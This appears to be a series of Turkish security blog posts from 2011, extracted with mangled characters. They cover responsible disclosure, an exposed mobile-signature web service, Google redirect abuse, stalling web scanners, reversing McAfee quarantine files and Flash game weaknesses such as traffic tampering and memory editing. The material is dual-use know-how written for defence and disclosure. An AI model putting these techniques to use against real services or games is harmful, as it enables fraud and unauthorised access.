detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

Ağırlıklı olarak xml tabanlı olan web servisler genelde iki farklı uygulamanın birbiri ile ortak bir dil uumlzerinden haberleşmesi amacıylakullanılmaktadır Bu sayede farklı programlama dilleri ile yazılmış iki uygulama birbirleri ile haberleşirken bir web servis kullanarakhaberleşme esnasında ortaya ccedilıkabilecek yazılımsaltasarımsal uyumsuzlukları veya engelleri ortadan kaldırmaktadır

Ccediloğunlukla son kullanıcı bir web uygulaması ile etkileşimde bulunurken arka planda bu uygulama kullanıcıya sunacağı iccedileriği farklısunuculardan web servis aracılığı ile toplamakta ve harmanladıktan sonra kullanıcıya sunmaktadır

Web servis denilince ccediloğu kişinin aklına XML ve SOAP gelmektedir SOAP XML kullanarak uygulamalar arası bilgi alışverişinin nasılsağlayacağını tanımlayan bir standart bir protokolduumlr XML ise veri goumlstermek amacıyla kullanılan HTMLin aksine veri taşımak vesaklamak iccedilin kullanılan bir dildir

Web servislerine youmlnelik tehditlerin başında XML enjeksiyonu XPath enjeksiyonu XML bombası paramatre manipuumllasyonu WSDLtaraması ve daha bir ccedilok tehdit gelmektedir

Web Services Description Language (WSDL) bir web servis ile iletişim kurulabilmesi iccedilin gerekli parametreleri metodları iccedilerirWSDLi dış duumlnyaya accedilık olan bir web servis uumlzerinde yer alan servis yukarda bahsi geccedilen tehditlere mağruz kalabildiği gibi servisinve hizmetin koumltuumlye kullanımını da yol accedilabilmektedir

Oumlrnek olarak X firmasının sitesinde yer alan bir gsm firmasına ait olan imzalama yazılımına kısaca goumlz atalım

Bu imzalama programı mobil imza kullanıcılarının kişisel bilgisayarlarındaki dosyaları cep telefonları aracılığıyla elektronik olarakimzalamalarını ve kendilerine gelen elektronik imzalanmış dosyaları doğrulamalarını sağlayabilen kurulumu ve kullanımı oldukccedila basitolan bir yazılımdır

Mobil İmza kullanma gayesiyle goumlz attığım bu yazılımın doğrudan bir web servis ile haberleşiyor olması ister istemez dikkatimi ccedilekmişticcediluumlnkuuml kurumsal ağlarda ve guumlvenli tasarlanan yazılımlarda son kullanıcının web servis ile muumlnasebet kurması ccedilok tercih edilmemektedir

26

WSDL dosyasına baktığımda KullanıcıVarMi ImzaIleLisansAl VarOlanLisansiGetir servisleri ilgimi ccedilekti Normal şartlarda imzalamauygulaması kullanılarak ccedilağrılabilecek bu servisler WSDLden elde edilen bilgiler ile istenildiği taktirde herhangi bir http isteği yapanbir araccedil uumlzerinden de ccedilağrılabilir Kısaca imzalama uygulaması yerine isteyen kendi uygulamasını hazırlayarak bu servisleri ccedilağırabilirve uygulama uumlzerinde yer alan kısıtlamalardan etkilenmeyebilir

Aklıma gelen ilk soru art niyetli bir kişi başkasına ait olan bir lisansı VarOlanLisansiGetir servisini ccedilağırarak getirebilir miydi Busorunun yanıtını her ne kadar merak etsem de etik accedilıdan doğru olmayacağını duumlşuumlnduumlğuumlm iccedilin aramaktan vazgeccediltim Bunun yerineKullanıcıVarMi servisi ile bir kaccedil sorgu gerccedilekleştirdim Bu servisin bir gsm şirketine ait olan herhangi bir telefon numarası ile ccedilağrılmasıdurumunda sunucudan true (var) ya da false (yok) şeklinde yanıt geldiğini goumlrduumlm Servisin ccedilalışıp ccedilalışmadığını teyit etmek iccedilin elimdemobil imza kullanan ve kullanmayan iki farklı cep telefonu numarası ile deneme gerccedilekleştirdim ve servisin ccedilalıştığını teyit ettim

27

Servisin bu şekilde isteyen herkes tarafından kullanılabiliyor olmasının art niyetli kişiler tarafından nasıl istismar edilebileceğiniduumlşuumlnmeye koyulduğumda aklıma gelen ilk senaryo şu şekilde oldu Bildiğiniz gibi man in the mobile saldırısı gerccedilekleştiren Zeusbankacılık trojanı kullanıcının cep telefonuna SMS şifresini ccedilalmak iccedilin bir trojan goumlndermektedir Boumlyle bir servisin halka accedilık olarakhizmet vermesi durumunda bu servisten faydalanan zararlı bir yazılım koumlruuml koumlruumlne kurbana ait olan cep telefonu numarasına SMSşifresini ccedilalan trojan goumlndermek yerine oumlncelikle bu servisi ccedilağırarak mobil imza kullanıcısı olup olmadığını teyit edebilir ve yanıtagoumlre mobil imza uygulamasını hedef alan zararlı bir yazılım goumlnderebilir Bu servisin bu şekli ile kullanılmasının bir gsm firmasınaait mobil imza kullanan banka muumlşterilerinin ve bankaların doğru bulmayacağını duumlşuumlnerek konuyu hemen X firmasına bildirmekiccedilin sayfalarında yer alan e-posta adresine bir e-posta goumlnderdim Bu adrese goumlnderilen e-postaları kontrol etmeyeceklerini duumlşuumlnerek(Tuumlrkiye gerccedileği) biraz araştırma yaparak genel muumlduumlruumln e-posta adresini bularak kendisine konu ile ilgili iletişim kurabileceğim biryetkilinin bilgisini oumlğrenmek iccedilin ayrı bir e-posta goumlnderdim Ancak iki hafta iccedilinde tarafıma herhangi bir geri doumlnuumlş yapılmadığı iccedilinbu servisin art niyetli kişiler tarafından bu şekilde kullanılmasını en kısa suumlrede engelleyebilmek adına bu yazıyı yazma ve ilgililerigoumlreve ccedilağırma misyonunu uumlstlendim

Yazının giriş kısmında da belirttiğim uumlzere web servislerin sadece uygulamalar arasında kullanılıyor olması ve son kullanıcı kullanımınakısıtlanıyor olması bu tuumlr tehditleri berteraf edilmesine yardımcı olacaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle

[28-03-2011] Guumlncelleme Firma genel muumlduumlruumlnuumln buguumln itibariyle tarafımla iletişime geccedilmesi ve firma isimlerinin yazıda geccedilmesindenoumltuumlruuml duyduğu rahatsızlığı dile getirmesi uumlzerine yazıda geccedilen firma isimleri sansuumlrlenmiştir Gerekli goumlruumllmesi durumunda ilerleyenzamanlarda kendileri ile gerccedilekleştirilen yazışmalara yer verilebilir

Googlersquoa Bile GuumlvenmeSource httpswwwmertsaricacomgooglea-bile-guvenmeBy MS on March 7th 2011

Milliyetcomtr web sitesinde yer alan bir haberde dolandırıcıların Gelir İdaresi Başkanlığına (wwwgibgovtr) ait olan internetvergi dairesi sitesinin bir kopyasını oluşturdukları ve benzer bir alan adı altında (wwwgibgentr) site kurarak insanları dolandırmaya

28

ccedilalıştıkları ortaya ccedilıkmış İşin ilginccedil yanı ise bu sahte sitenin Google arama motorunda motorlu taşıtlar vergisi anahtar kelimesi ileyapılan aramalarda ilk sırada ccedilıkabilmesi iccedilin dolandırıcılar tarafından Googlea reklam verilmiş olması

Aslında yıllardan beri Google arama motoru uumlzerinde zararlı kod yayan sitelerden dolandırıcılık amacıyla kurulmuş olan sitelere kadarbir ccedilok zararlı sitenin kullanıcıları benzer youmlntemler ile hedef aldığı bilinmektedir Googleda bunlar karşısında boş durmayarak zararlıkod yayan siteleri tespit etmekte ve arama sonuccedillarına ilgili site iccedilin ufak bir ibare ekleyerek ziyaret edilmek istenen sitenin pek teguumlvenilir olmadığı konusunda kullancıları bilgilendirmektedir

Zararlı ve sahte sitelerin ister istemez Google arama sonuccedillarında yer alabilmesi kullanıcılar iccedilin tehlike oluştururken bence koumltuumlyekullanılabilecek bir diğer tehlike ise Google arama motorunda yer alan kendimi şanslı hissediyorum arama oumlzelliğidir Herhangi biranahtar kelime yazıp (web adresi de olabilir) bu butona basacak olursanız anahtar kelimeniz ile ilişkili olan ilk web sitesine youmlnlendiğinizi(URL Redirection) goumlrebilirsiniz

Her ne kadar Google ip adreslerine youmlnlendirme yapmıyor olsa da anahtar kelime olarak yazının başında bahsetmiş olduğumdolandırıcılar tarafından kurulan web sitesinin adresini yazmanız durumunda bu adrese sizi seve seve youmlnlendirecektir

Google Uumlzerinden Youmlnlendirme Oumlrneği (Kendimi Şanslı Hissediyorum) Kendini şanslı hissediyor musun

Kendimi şanslı hissediyorum youmlnlendirmesine ilave olarak Google arama motoru uumlzerinde başka bir youmlnlendirme daha mevcut OumlrneğinFirefox internet tarayıcısı uumlzerinde adres ccedilubuğuna root yazıp enter tuşuna basacak olursanız kendinizi httprootcernchdrupalsitesinde bulduğunuzu goumlrebilirsiniz Yine arka tarafta bunun nasıl ccedilalıştığına bakacak olursak adres ccedilubuğuna yazacağınız bir kelimearka tarafta Google arama motoruna giderek sizi bu anahtar kelime ile ilişkili olan site başlığına (title) sahip ilk siteye youmlnlendirmektedir

Google Uumlzerinden Youmlnlendirme Oumlrneği Googlea bile guumlvenme

Sonuccedil olarak bu tuumlr kontrolsuumlz URL youmlnlendirmelerinin phishing saldırılarından istismar paketlerine (exploit pack) youmlnlendirmeye kadarkoumltuumlye kullanıldığına bir ccedilok defa tanık olmuştum ancak Google arama motorunun bu tuumlr saldırılara imkan tanıyacak bir tasarıma sahipolduğu buguumlne dek hiccedil dikkatimi ccedilekmemişti Siz siz olun gelen bağlantı adresi googlecomgooglecomtr iccedileriyor diye koumlruuml koumlruumlnetıklamayın

Bir sonraki yazı ile goumlruumlşmek dileğiyle

Script Kiddie Bezdirme MekanizmasıSource httpswwwmertsaricacomscript-kiddie-bezdirme-mekanizmasiBy MS on February 27th 2011

Guumlnuumlmuumlzde internete accedilık web sitelerinin kaderinde ya Ccedilin uumlzerinden ya da Rusya uumlzerinden en az bir defa taranmak vardır Bunu webuygulamaları uumlzerindeki zafiyetleri otomatik olarak tespit etmek ve istismar etmek uumlzere hazırlanmış bir solucan (worm) yaptığı gibiproxy arkasına gizlenmiş meraklı bir script kiddie de yapıyor olabilir

Benim sitem de zaman zaman meraklı arkadaşların ilgi alanına girmekte ve Netsparkerdan Acunetixe kadar bir ccedilok ticari webuygulaması guumlvenlik tarayıcıları (web application security scanner) ile taranmaktadır Her ne kadar bu zamana dek bu durumdamşikayetccedili olmasamda kendimi şikayet edenlerine yerine koyarak acaba bu script kiddielerin işlerini mod_security ve benzer karmaşıkyoumlntemlere başvurmadan nasıl zorlaştırabilirim sorusuna yanıt aramaya koyuldum

Script kiddienin ticari araccedillar ile tarama işlemini simuumlle etmek iccedilin ilk olarak Windows işletim sistemi yuumlkluuml olan sanal makine iccedilinebir web sunucusu kurmam gerekiyordu ve seccedilimimi WAMPtan yana kullandım Daha sonra demo suumlruumlmuuml ile bu web sunucusunutarayabilecek meşhur ticari bir tarama aracı aramaya başladım Eskiden web uygulaması guumlvenlik tarayıcısı denilince akla ya HPfirmasının satın aldığı Spi Dynamics firmasının Webinspect uumlruumlnuuml ya da IBM firmasının satın aldığı Watchfire firmasının Appscan uumlruumlnuumlgelirdi Her ne kadar HP satın alana dek Webinspectin hayranı olsam da bu senaryoda IBMin Appscan demo uumlruumlnuumlnuuml kullanmayakarar verdim

Başka bir sanal makineye Appscan uumlruumlnuumlnuuml kurduktan sonra diğer sanal makinemde kurulu olan web sunucusunu tarayabilmek iccedilinufak bir numara ile httpdemotestfirenet sitesini taranacak sanal makinemin ip adresine youmlnlendirdim ve zorlaştırma youmlntemi uumlzerineduumlşuumlnmeye başladım (Webinspect ve Appscan araccedillarının demo suumlruumlmleri ile sadece kendi demo sitelerini (Appscan iccedilin httpdemotestfirenet web adresi Webinspect iccedilin httpzerowebappsecuritycom web adresi) tarayabilmektesiniz)

Penetrasyon testlerinde karşılaşmak istemeyeceğiniz durumlardan biri uzun suumlren taramanın tamamlanmasına yakın tarama aracınıngoumlccedilmesi bir diğeri ise taranan sitenin ccedilok buumlyuumlk olması ve isteklere geccedil yanıt veriyor olması nedeniyle taramanın saatlerce suumlrmesidirKorsanlar ve script kiddieler genellikle sabırsız insanlardır bu nedenle hedefe bir an oumlnce sızmak iccedilin en kestirme en hızlı yoluseccedilmektedirler Bunu goumlz oumlnuumlnde bulundurarak tarama aracının 10 dakikada tarayabileceği bir siteyi ufak bir numara ile saatler iccedilindetaramasını sağlayabilmenin script kiddieyi bezdirebileceği duumlşuumlncesiyle Appscani biraz etuumlt etmeye başladım

Appscan ccedilalışma prensibi gereği hedef web sitesini taramaya başlamadan oumlnce site uumlzerinde keşfe ccedilıkmakta ve sitenin haritasınıccedilıkarmaktadır Keşif aşaması tamamlandıktan hemen sonra tarama işlemine geccedilmekte ve bu aşamada yeni bir bağlantı adresi (link) ilekarşılaşması durumunda bu adresi otomatik olarak taranacaklar listesine dahil etmektedir Durum boumlyle olunca acaba bir web sayfasıhazırlasam ve bu sayfa her ziyaret edildiğinde rastgele bağlantı adresi uumlretiyor olsa bu sayfayı ziyaret eden Appscan yeni bağlantı adresi-gt tara -gt yeni bağlantı adresi -gt tara şeklinde sonsuz bir doumlnguumlye girer mi sorusuna yanıt aramaya başladım

29

Bunun iccedilin oumlncelikle httpdconf uumlzerinde oumlzel bir hata sayfası oluşturdum (missingphp) ki bulamadığı her sayfa iccedilin otomatik olarakmissingphp sayfasına youmlnlendirilsin ve bu sayfada uumlretilen rastgele 100 bağlantı adresi sayesinde sonsuz doumlnguumlye girebildin Bir kaccedildeneme sonucunda Appscani doumlnguumlye (sonsuz olabilir) sokan sayfayı oluşturdum ve muradıma erdim

httpdconf uumlzerinde oumlzel hata sayfası belirtme

Oluşturduğum web sayfaları

30

Normal şartlarda 2 dakikada taranabilen bir sayfa 46 dakika sonunda halen taranmaya ve ziyaret edilecek URL (resimde sol alt koumlşeyedikkat) sayısı artmaya devam ediyor (doumlnguuml)

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

